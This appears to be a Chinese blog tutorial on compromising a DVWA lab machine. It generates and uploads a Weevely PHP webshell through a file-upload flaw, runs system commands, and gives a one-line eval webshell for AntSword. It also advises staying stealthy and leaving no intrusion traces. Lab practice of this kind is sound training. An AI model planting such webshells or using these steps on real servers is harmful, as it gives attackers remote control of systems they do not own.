当前位置: 首页 > article >正文

在DVWA靶机从渗透到控制(weevely和中国蚁剑)

在DVWA靶机从渗透到控制(weevely和中国蚁剑)

摘要

本文将详细介绍如何使用Weevely工具对运行在Ubuntu系统上的DVWA(Damn Vulnerable Web Application)进行渗透测试。我们将通过一个具体的实例,展示如何利用Weevely实现对低安全等级的DVWA靶机的攻击,并最终获取系统的控制权。实验环境为:靶机IP 192.168.1.37,攻击机Kali Linux IP 10.211.55.29。

一、前言

Weevely是一款基于Python编写的轻量级Webshell管理工具,广泛应用于渗透测试中。它可以通过上传或注入PHP代码片段来获取远程服务器的访问权限。本文将结合DVWA靶机,介绍Weevely的基本使用方法及其应用场景。

二、实验环境搭建
  1. 靶机配置
    • 系统:Ubuntu Server
    • 应用:DVWA (Damn Vulnerable Web Application)
    • 安全等级:Low
    • IP地址:192.168.1.37
  2. 攻击机配置
    • 系统:Kali Linux
    • 工具:Weevely, Burp Suite, Metasploit等
    • IP地址:10.211.55.29
三、Weevely安装与配置
  1. 安装Weevely 在Kali Linux上,可以通过以下命令安装Weevely:

    sudo apt-get update
    sudo apt-get install weevely
    
  2. 生成Webshell 使用Weevely生成一个PHP Webshell文件,并将其保存到本地磁盘:

    weevely generate /home/parallels/Downlads/t.php 123
    
四、Webshell上传与验证
  1. 登录DVWA 打开浏览器,访问http://192.168.1.37/dvwa/,并使用默认用户名和密码(admin/password)登录DVWA。

截屏2025-01-07 09.16.54

  1. 设置安全等级 将DVWA的安全等级设置为“Low”,以确保漏洞更容易被利用。

截屏2025-01-07 09.18.06

  1. 上传Webshell 进入DVWA的“File Upload”模块,选择之前生成的t.php文件并上传。上传成功后,记下Webshell的URL路径(例如:http://192.168.1.37/dvwa/hackable/uploads/t.php)。

  2. 验证Webshell 使用Weevely连接到已上传的Webshell:

weevely http://192.168.1.37/dvwa/hackable/uploads/t.php password #这里是123

截屏2025-01-07 09.24.16

如果连接成功,你将看到Weevely的交互式命令行界面。

五、执行命令与获取系统信息
  1. 列出目录 在Weevely命令行中输入ls,查看当前目录下的文件列表。
  2. 切换目录 使用cd /var/www/html切换到Web根目录。
  3. 获取系统信息 输入uname -a获取系统的内核版本信息,或者使用whoami查看当前用户。
  4. 提权尝试 如果需要进一步提权,可以尝试查找敏感文件(如/etc/passwd),或利用其他漏洞进行横向移动。

截屏2025-01-07 09.40.23

六、在kali linux里用vim编辑一个名为shell.php的文件,接下来的步骤用中国蚁剑连接,内容类似于:
<?php @eval($_POST['weevely']); ?>

截屏2025-01-07 09.13.49

截屏2025-01-07 09.14.44

七、总结

通过上述步骤,我们成功地使用Weevely工具对DVWA靶机进行了渗透测试,并获取了远程服务器的部分控制权。虽然DVWA是一个低安全等级的应用程序,但在实际渗透测试中,类似的漏洞可能存在于更复杂的环境中。因此,掌握Weevely的使用方法对于提高渗透测试技能具有重要意义。

七、注意事项
  • 在实际环境中,请确保拥有合法授权后再进行任何渗透测试活动。
  • 使用Weevely时,务必注意隐蔽性和安全性,避免留下明显的入侵痕迹。
  • 对于生产环境中的Web应用程序,建议定期进行安全评估和漏洞修复。

希望这篇文章能够帮助读者更好地理解Weevely的工作原理及其在渗透测试中的应用。如果有任何问题或建议,欢迎留言交流。

作者简介
吉林白城 70后高级网络安全工程师,双专业、双工学学士学位。阿里云乘风者计划专家博主、51CTO网站合作博主。拥有超过20年的IT行业经验,专注于网络安全、人工智能、运维、数据分析及办公自动化。持有CISE和CISP-PTE认证,在安全架构设计与实施方面经验丰富。擅长利用Python解决复杂问题,推动自动化和效率提升。热衷于技术分享,帮助更多人掌握先进技术和方法。

如有网络安全、人工智能、训练应用大模型等方面业务需求。欢迎联系!

联系方式:

  • Email: 1134593154@qq.com

http://www.kler.cn/a/471201.html

相关文章:

  • 分享3个国内使用正版GPT的网站【亲测有效!2025最新】
  • 以C++为基础快速了解C#
  • 深入探讨 Android 中的 AlarmManager:定时任务调度及优化实践
  • 51c自动驾驶~合集45
  • Python自学 - 函数初步(内置函数、模块函数、自定义函数)
  • 数学建模入门——描述性统计分析
  • Taro地图组件和小程序定位
  • 十五、Vue 响应接口
  • [大模型开源]SecGPT 网络安全大模型
  • java调用外部API,通过http请求,HttpGet和HttpPost方式实现
  • Elixir语言的正则表达式
  • HDFS异构存储和存储策略
  • 51单片机——步进电机模块
  • 使用 SAML 2.0协议需要注意的安全问题
  • .net core 线程锁,互斥锁,自旋锁,混合锁
  • shell-条件判断
  • iOS - 线程与AutoreleasePoolPage
  • 全覆盖路径规划算法之BCD源码实现(The Boustrophedon Cellular Decomposition)
  • linux下多个硬盘划分到同一挂载点
  • 电子应用设计方案87:智能AI收纳箱系统设计
  • SSR 【1】【nuxt安装】
  • pytorch torch.full_like函数介绍
  • 主板疑难杂症之解析(Analysis of Difficult and Miscellaneous Problems of Motherboard)
  • LogMiner
  • 【shell编程】报错信息:bash: bad file descriptor(包含6种解决方法)
  • Blazor用户身份验证状态详解